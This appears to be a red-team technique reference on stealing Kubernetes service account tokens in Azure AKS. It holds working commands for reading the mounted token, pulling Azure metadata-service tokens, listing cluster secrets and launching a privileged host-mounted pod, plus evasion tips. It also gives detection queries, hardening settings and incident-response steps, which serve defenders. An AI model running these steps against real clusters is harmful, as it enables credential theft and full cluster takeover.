| Attribute | Details |
|---|---|
| Technique ID | LM-AUTH-030 |
| MITRE ATT&CK v18.1 | T1528 - Steal Application Access Token |
| Tactic | Credential Access / Lateral Movement |
| Platforms | Entra ID, Azure Kubernetes Service (AKS) |
| Severity | Critical |
| CVE | N/A |
| Technique Status | ACTIVE |
| Last Verified | 2025-01-10 |
| Affected Versions | Kubernetes 1.18+, AKS all versions |
| Patched In | N/A (Requires configuration hardening) |
| Author | SERVTEP – Artur Pchelnikau |
Concept: Kubernetes automatically mounts service account tokens to containers by default, allowing processes within pods to authenticate to the Kubernetes API server. When a container is compromised, attackers can extract this token from the pod’s filesystem (typically at /var/run/secrets/kubernetes.io/serviceaccount/token) and use it to interact with the Kubernetes API. This grants the attacker the permissions of that service account, enabling lateral movement across the cluster, secret enumeration, and further resource compromise.
Attack Surface: The service account token mounted on every pod; the Kubernetes API server (typically accessible at https://kubernetes.default.svc.cluster.local:443 from within the cluster); the instance metadata service (Azure WireServer) for retrieving bootstrap tokens in AKS environments.
Business Impact: Complete cluster compromise possible. An attacker with a compromised service account token can enumerate all resources in the cluster, steal secrets stored in etcd, pivot to other namespaces, create new workloads with malicious code, exfiltrate data, or launch denial-of-service attacks. If the compromised pod has broad permissions (e.g., cluster-admin), the attacker gains administrative control of the entire Kubernetes cluster.
Technical Context: This attack typically occurs in under 60 seconds once container access is established. Detection is difficult because legitimate Kubernetes components regularly access the API using service account tokens. The attack leaves minimal forensic evidence unless API audit logging is enabled.
| Framework | Control / ID | Description |
|---|---|---|
| CIS Benchmark | 5.1.5 | Ensure that default service accounts are not actively used |
| CIS Benchmark | 5.2.2 | Minimize the admission of containers wishing to share the host IPC namespace |
| DISA STIG | V-254380 | Disable automounting of service account tokens |
| CISA SCuBA | Configuration E.1 | Disable automatic service account token mounting |
| NIST 800-53 | AC-3 | Access Enforcement |
| NIST 800-53 | SC-7 | Boundary Protection |
| GDPR | Art. 32 | Security of Processing |
| DORA | Art. 9 | Protection and Prevention of Threats |
| NIS2 | Art. 21 | Cyber Risk Management Measures |
| ISO 27001 | A.9.2.3 | Management of Privileged Access Rights |
| ISO 27005 | Risk Scenario | Compromise of Container Orchestration Platform |
Supported Versions: Kubernetes 1.18+, AKS all versions (default configuration)
Objective: Gain shell access to a running container within the AKS cluster.
Prerequisite Tactics:
Command (Linux Container):
# Assuming you have shell access to the container via RCE, kubectl exec, or docker exec
# List the mounted service account token
cat /var/run/secrets/kubernetes.io/serviceaccount/token
Expected Output:
eyJhbGciOiJSUzI1NiIsImtpZCI6IklGMWZzYWRmN2R...
What This Means:
OpSec & Evasion:
Troubleshooting:
Permission denied: /var/run/secrets/kubernetes.io/serviceaccount/token
automountServiceAccountToken: true (default) in the pod specReferences & Proofs:
Objective: In AKS, pods sharing the host network namespace can access the Azure WireServer metadata service, which provides bootstrap tokens with elevated privileges.
Version Note: This technique is specific to Azure Kubernetes Service (AKS). It does NOT work on GKE or self-managed Kubernetes clusters.
Command (Host Network Pod):
# From within a pod with hostNetwork: true
curl -s "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2017-09-01&resource=https://management.azure.com" \
-H "Metadata:true" | jq '.access_token' -r
# Alternatively, query for the bootstrap token (if accessible)
curl -s "http://168.63.129.16/metadata/instance?api-version=2021-02-01" \
-H "Metadata:true" | jq .
Expected Output:
eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImtpZCI6IjE4MjcyMjJkO...
What This Means:
OpSec & Evasion:
Troubleshooting:
curl: (7) Failed to connect to 169.254.169.254
hostNetwork: true or the metadata service is restrictedhostNetwork: true in the pod specReferences & Proofs:
Objective: Authenticate to the Kubernetes API server using the stolen token to enumerate cluster resources and exfiltrate sensitive data.
Command (From Compromised Pod or External Machine):
# Set the token variable
TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
APISERVER=https://kubernetes.default.svc.cluster.local:443
# Test connectivity to the API server
curl -k -H "Authorization: Bearer $TOKEN" \
$APISERVER/api/v1/namespaces
# List all pods in the current namespace
curl -k -H "Authorization: Bearer $TOKEN" \
$APISERVER/api/v1/namespaces/$(cat /var/run/secrets/kubernetes.io/serviceaccount/namespace)/pods
# Attempt to list secrets
curl -k -H "Authorization: Bearer $TOKEN" \
$APISERVER/api/v1/namespaces/$(cat /var/run/secrets/kubernetes.io/serviceaccount/namespace)/secrets
# If service account has cluster-wide permissions, enumerate all secrets across namespaces
curl -k -H "Authorization: Bearer $TOKEN" \
$APISERVER/api/v1/secrets
Expected Output:
{
"apiVersion": "v1",
"items": [
{
"apiVersion": "v1",
"data": {
"password": "c3VwZXJzZWNyZXQxMjM=",
"username": "YWRtaW4="
},
"kind": "Secret",
"metadata": {
"name": "db-credentials",
"namespace": "default"
},
"type": "Opaque"
}
],
"kind": "SecretList",
"metadata": {
"resourceVersion": "123456"
}
}
What This Means:
get secrets permissiondata field in Kubernetes secrets is Base64-encoded, NOT encrypted – any tool can decode itOpSec & Evasion:
--audit-log-maxage is configuredkubectl with the token (via --token flag) rather than raw curl to appear more legitimateTroubleshooting:
{ "kind": "Status", "apiVersion": "v1", "metadata": {}, "status": "Failure", "message": "secrets is forbidden", "reason": "Forbidden"}
get permissions on the secrets resourceReferences & Proofs:
Objective: Use API access to create a new pod with elevated privileges (if service account has pod creation permission), enabling further escalation or persistence.
Command (Using stolen token):
# Create a malicious pod spec
cat > /tmp/evil-pod.yaml <<EOF
apiVersion: v1
kind: Pod
metadata:
name: privilege-escalation-pod
namespace: default
spec:
hostNetwork: true
hostPID: true
hostIPC: true
containers:
- name: shell
image: ubuntu:22.04
securityContext:
privileged: true
runAsUser: 0
command: ["sleep", "3600"]
volumeMounts:
- name: host-root
mountPath: /host
volumes:
- name: host-root
hostPath:
path: /
EOF
# Submit the pod using the stolen token
curl -k -X POST \
-H "Authorization: Bearer $TOKEN" \
-H "Content-Type: application/yaml" \
-d @/tmp/evil-pod.yaml \
https://kubernetes.default.svc.cluster.local:443/api/v1/namespaces/default/pods
# Exec into the pod (if you have pod creation permissions, you likely have exec permissions)
curl -k -X POST \
-H "Authorization: Bearer $TOKEN" \
-N -T /dev/stdin \
"https://kubernetes.default.svc.cluster.local:443/api/v1/namespaces/default/pods/privilege-escalation-pod/exec?command=bash&stdin=true&stdout=true&stderr=true&tty=true"
Expected Output:
pod/privilege-escalation-pod created
# Interactive shell access to the host filesystem
root@privilege-escalation-pod:/#
What This Means:
/host) has been createdOpSec & Evasion:
ubuntu:22.04 or redis:latest) to blend in with normal workloadsTroubleshooting:
{ "kind": "Status", "apiVersion": "v1", "metadata": {}, "status": "Failure", "message": "pods is forbidden", "reason": "Forbidden"}
References & Proofs:
Supported Versions: Kubernetes 1.18+, all versions
Objective: Set up a local kubectl client to use the stolen token for authentication, enabling command-line interaction with the cluster.
Command:
# Extract the token from the pod
export TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
export API_SERVER="https://kubernetes.default.svc.cluster.local:443"
export NAMESPACE=$(cat /var/run/secrets/kubernetes.io/serviceaccount/namespace)
# Create a kubeconfig file with the stolen token
cat > /tmp/kubeconfig <<EOF
apiVersion: v1
kind: Config
clusters:
- cluster:
certificate-authority-data: LS0tLS1CRUdJTiBDRVJ... # (Base64-encoded CA cert)
server: https://your-aks-cluster.hcp.eastus.azmk8s.io:443
name: your-aks-cluster
contexts:
- context:
cluster: your-aks-cluster
namespace: $NAMESPACE
user: service-account
name: default
current-context: default
users:
- name: service-account
user:
token: $TOKEN
EOF
# Use the kubeconfig to interact with the cluster
export KUBECONFIG=/tmp/kubeconfig
kubectl get pods
kubectl get secrets
kubectl exec -it <pod-name> -- /bin/bash
Expected Output:
NAME READY STATUS RESTARTS AGE
my-application-7d9f8c 1/1 Running 0 2d
database-pod-5c8b6f 1/1 Running 1 5d
What This Means:
OpSec & Evasion:
-v) which may be loggedTroubleshooting:
error: unable to get API server...
az aks show --name <cluster-name> --query fqdn)References & Proofs:
Supported Versions: AKS (Azure Kubernetes Service) running Kubernetes 1.18+
Objective: In AKS environments, retrieve a bootstrap token with elevated privileges from the Azure Instance Metadata Service.
Prerequisite: The pod must be running with hostNetwork: true to access the metadata service.
Command:
# Query the Azure Instance Metadata Service
WIRESERVER="http://168.63.129.16/"
IMDS_TOKEN=$(curl -s -H "Metadata:true" \
"http://169.254.169.254/metadata/identity/oauth2/token?api-version=2017-09-01&resource=https://management.azure.com" | jq -r '.access_token')
# Decode and inspect the token (JWT structure)
echo $IMDS_TOKEN | cut -d'.' -f2 | base64 -d | jq .
# Use the token to access Azure resources
curl -s -H "Authorization: Bearer $IMDS_TOKEN" \
"https://management.azure.com/subscriptions?api-version=2020-01-01" | jq .
Expected Output:
{
"aud": "https://management.azure.com",
"iss": "https://sts.windows.net/12345678-1234-1234-1234-123456789012/",
"iat": 1234567890,
"nbf": 1234567890,
"exp": 1234571490,
"aio": "E2RgYIg/12345+abcde/ABCD==",
"appid": "00000000-0000-0000-0000-000000000000",
"appidacr": "2",
"idp": "https://sts.windows.net/12345678-1234-1234-1234-123456789012/",
"oid": "87654321-4321-4321-4321-210987654321",
"rh": "0.ARoA1234567...",
"sub": "87654321-4321-4321-4321-210987654321",
"tid": "12345678-1234-1234-1234-123456789012",
"uti": "abcdefghijklmnop",
"ver": "1.0"
}
What This Means:
tid (tenant ID) and oid (object ID) identify the managed identity associated with the nodeOpSec & Evasion:
Troubleshooting:
curl: (7) Failed to connect to 169.254.169.254
hostNetwork: truehostNetwork: trueReferences & Proofs:
Command (Atomic Simulation):
# Simulate a compromised pod environment
docker run --rm -v $HOME/.kube:/root/.kube ubuntu:22.04 bash -c '
# Extract token from volume mount (simulating token theft)
TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token 2>/dev/null || echo "token-not-mounted")
echo "Stolen Token: $TOKEN"
# Attempt API access
curl -k -s -H "Authorization: Bearer $TOKEN" https://kubernetes.default.svc.cluster.local:443/api/v1/namespaces 2>&1 | head -20
'
Reference:
Version: 1.1.8+
Minimum Version: 1.0
Supported Platforms: Linux, macOS, Windows (WSL)
URL: https://github.com/inguardians/peirates
Installation:
git clone https://github.com/inguardians/peirates.git
cd peirates
go build -o peirates main.go
./peirates --help
Usage:
# Run Peirates in interactive mode
./peirates
# List available service account tokens
> available_pods
> steal_token
> kubectl_commands
Version: v1.28+
Minimum Version: v1.18
Supported Platforms: All (Linux, macOS, Windows)
URL: https://kubernetes.io/docs/tasks/tools/
Installation:
# macOS
brew install kubectl
# Linux
curl -LO "https://dl.k8s.io/release/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl"
chmod +x kubectl
sudo mv kubectl /usr/local/bin/
# Windows
choco install kubernetes-cli
Usage:
# Set kubeconfig with stolen token
export KUBECONFIG=/tmp/kubeconfig
kubectl get pods
kubectl get secrets
kubectl exec -it <pod> -- /bin/bash
Version: 7.0+
Installation: Typically pre-installed on Linux/macOS; available for Windows
Usage:
TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
curl -k -H "Authorization: Bearer $TOKEN" https://kubernetes.default.svc.cluster.local:443/api/v1/namespaces
Rule Configuration:
KubeAudit (if audit logging enabled)username, verb, objectRef, sourceIPsKQL Query:
KubeAudit
| where verb in ("get", "list") and objectRef.resource == "secrets"
| where username has "system:serviceaccount"
| where sourceIPs != "10.0.0.0/8" and sourceIPs != "172.16.0.0/12" // Exclude internal cluster IPs
| summarize count() by username, objectRef.namespace, sourceIPs
| where count_ > 5 // Threshold: more than 5 secret list operations
| project-reorder username, objectRef_namespace=objectRef.namespace, sourceIPs, count_
What This Detects:
Manual Configuration Steps (Azure Portal):
Unusual Kubernetes Secret Enumeration via Service Account TokenHigh5 minutes24 hoursManual Configuration Steps (PowerShell):
Connect-AzAccount
$ResourceGroup = "YourResourceGroup"
$WorkspaceName = "YourSentinelWorkspace"
New-AzSentinelAlertRule -ResourceGroupName $ResourceGroup -WorkspaceName $WorkspaceName `
-DisplayName "Unusual Kubernetes Secret Enumeration" `
-Query @"
KubeAudit | where verb in ("get", "list") and objectRef.resource == "secrets"
| where username has "system:serviceaccount"
| where sourceIPs != "10.0.0.0/8" and sourceIPs != "172.16.0.0/12"
| summarize count() by username, objectRef.namespace, sourceIPs
| where count_ > 5
"@ `
-Severity "High" `
-Enabled $true
Source: Microsoft Sentinel Kubernetes Monitoring
Rule Configuration:
ContainerImageInventory, ContainerProcessEventscontainerName, process.name, process.commandLineKQL Query:
ContainerProcessEvents
| where process.name in ("cat", "dd", "cp")
and process.commandLine has "/var/run/secrets/kubernetes.io/serviceaccount/token"
| project TimeGenerated, ContainerName=containerName, Process=process.name, Command=process.commandLine
| join kind=inner (
KubeAudit | where verb == "exec" and objectRef.resource == "pods"
) on $left.ContainerName == $right.objectRef.name
What This Detects:
Source: Microsoft Defender for Containers Detection
Disable Automatic Service Account Token Mounting: Prevent the kubelet from automatically mounting service account tokens to pods that do not need them.
Pod YAML Configuration (Pod Security Standard):
apiVersion: v1
kind: Pod
metadata:
name: example-pod
spec:
serviceAccountName: example-sa
automountServiceAccountToken: false # Disable token mounting
containers:
- name: app
image: my-app:latest
Manual Steps (Cluster-wide via Pod Security Standards):
automountServiceAccountToken: falseManual Steps (PowerShell):
# Update cluster to enforce Pod Security Standards
az aks update --resource-group myResourceGroup --name myAKSCluster `
--enable-managed-identity --pod-security-policy-enforce restricted
Version Note: Kubernetes 1.23+ supports Pod Security Standards; earlier versions require Pod Security Policies (deprecated in 1.25+)
Implement Network Policies: Restrict egress from pods to the Kubernetes API server, allowing only necessary services to communicate with the API.
Network Policy Configuration (Calico):
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
name: restrict-api-access
namespace: default
spec:
podSelector: {} # Apply to all pods in namespace
policyTypes:
- Egress
egress:
- to:
- podSelector:
matchLabels:
k8s-app: kube-dns
ports:
- protocol: UDP
port: 53
- to:
- namespaceSelector: {}
podSelector:
matchLabels:
k8s-app: kubernetes-dashboard
Manual Steps (Azure Portal):
kubernetes.default.svc.cluster.local:443 for non-system podsEnable Kubernetes Audit Logging: Configure audit logging to detect and log all API server access, including token usage.
Manual Steps (Azure Portal):
Manual Steps (PowerShell):
az aks update --resource-group myResourceGroup --name myAKSCluster `
--enable-managed-identity --enable-pod-security-policy
# Enable audit logging to Log Analytics
az aks update --resource-group myResourceGroup --name myAKSCluster `
--workspace-resource-id /subscriptions/{subscriptionId}/resourcegroups/{resourceGroup}/providers/microsoft.operationalinsights/workspaces/{workspaceName}
Use Azure Key Vault for Secrets Management: Instead of storing secrets in Kubernetes secrets, use Azure Key Vault with managed identities for RBAC-based access.
Configuration (Azure Workload Identity Addon):
apiVersion: v1
kind: ServiceAccount
metadata:
name: workload-identity-sa
namespace: default
annotations:
azure.workload.identity/client-id: <client-id>
---
apiVersion: v1
kind: Pod
metadata:
name: keyvault-pod
namespace: default
labels:
azure.workload.identity/use: "true"
spec:
serviceAccountName: workload-identity-sa
containers:
- name: app
image: my-app:latest
env:
- name: AZURE_CLIENT_ID
value: <client-id>
- name: AZURE_TENANT_ID
value: <tenant-id>
- name: AZURE_FEDERATED_TOKEN_FILE
value: /var/run/secrets/workload.azure.com/serviceaccount/token
Manual Steps (Azure Portal):
Enforce RBAC on Service Accounts: Limit service account permissions to only the minimum required resources and verbs.
RBAC Configuration (ClusterRole):
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
name: minimal-role
rules:
- apiGroups: [""]
resources: ["pods"]
verbs: ["get", "list"]
- apiGroups: [""]
resources: ["configmaps"]
verbs: ["get"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
name: minimal-binding
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: minimal-role
subjects:
- kind: ServiceAccount
name: my-app-sa
namespace: default
Manual Steps (kubectl):
# Create a minimal role and bind it to a service account
kubectl create clusterrole minimal-role --verb=get,list --resource=pods
kubectl create clusterrolebinding minimal-binding --clusterrole=minimal-role --serviceaccount=default:my-app-sa
Enable Pod Security Standards: Enforce security policies at the cluster level to restrict privileged pod creation.
Manual Steps (Azure Portal):
Implement Admission Controllers: Use OPA Gatekeeper or Azure Policy to enforce pod security policies.
OPA Gatekeeper Example:
# Deny pods with automountServiceAccountToken: true (except system pods)
deny[msg] {
input.request.kind.kind == "Pod"
input.request.object.spec.automountServiceAccountToken == true
not is_system_namespace
msg := "Service account token auto-mounting is not allowed"
}
is_system_namespace {
input.request.namespace == "kube-system"
}
Manual Installation (Helm):
helm repo add gatekeeper https://open-policy-agent.github.io/gatekeeper/charts
helm install gatekeeper/gatekeeper --name-template=gatekeeper --namespace gatekeeper-system --create-namespace
# Check if service account token auto-mounting is disabled for a pod
kubectl get pod <pod-name> -o jsonpath='{.spec.automountServiceAccountToken}'
# Expected output: false
# Verify audit logging is enabled
az aks show --name <cluster-name> --resource-group <resource-group> --query addonProfiles.omsagent.enabled
# Expected output: true
# Verify network policies are in place
kubectl get networkpolicies --all-namespaces
# Expected output: List of network policies
What to Look For:
automountServiceAccountToken: false unless they explicitly require API access/var/run/secrets/kubernetes.io/serviceaccount/token (read operations on containers)GET/LIST operations on secrets, pods, configmaps resourceskubernetes.default.svc.cluster.local:443 from non-system pods169.254.169.254 (Azure IMDS) from pods with hostNetwork: truekube-audit and kube-audit-admin logs in /var/log/kube-audit* or Azure Log Analytics (table: KubeAudit).bash_history, .sh_history)AzureDiagnostics table showing API calls using the service account principal# Delete the compromised pod
kubectl delete pod <compromised-pod> --namespace <namespace> --grace-period=0 --force
# Block the service account (revoke credentials)
kubectl delete serviceaccount <sa-name> --namespace <namespace>
Manual (Azure Portal):
# Export pod logs
kubectl logs <compromised-pod> --namespace <namespace> > /evidence/pod-logs.txt
# Export audit logs
az aks get-credentials --name <cluster-name> --resource-group <resource-group>
kubectl get events --namespace <namespace> --sort-by='.lastTimestamp' > /evidence/events.txt
# Collect Azure diagnostic logs
az monitor log-analytics query --workspace-id <workspace-id> \
--analytics-query "KubeAudit | where username has '<service-account>' | project TimeGenerated, verb, objectRef, sourceIPs"
Manual:
# Revoke all tokens for the affected service account
kubectl delete secret -l serviceaccount=<sa-name> --namespace <namespace>
# Reset the service account
kubectl delete serviceaccount <sa-name> --namespace <namespace>
kubectl create serviceaccount <sa-name> --namespace <namespace>
# Re-bind RBAC roles if needed
kubectl create rolebinding <rb-name> --clusterrole=<role> --serviceaccount=<namespace>:<sa-name>
Manual:
| Step | Phase | Technique | Description |
|---|---|---|---|
| 1 | Initial Access | [IA-EXPLOIT-004] Kubelet API Unauthorized Access | Attacker gains access to exposed Kubernetes API or container |
| 2 | Persistence | [LM-AUTH-030] AKS Service Account Token Theft | Current Step: Token extracted from pod filesystem |
| 3 | Lateral Movement | [LM-AUTH-031] Container Registry Cross-Registry | Token used to access ACR in different tenant |
| 4 | Impact | [LM-AUTH-032] Function App Identity Hopping | Token used to chain to Azure Function App identity |
| 5 | Impact | Data Exfiltration via Stolen Credentials | Secrets and data extracted using escalated permissions |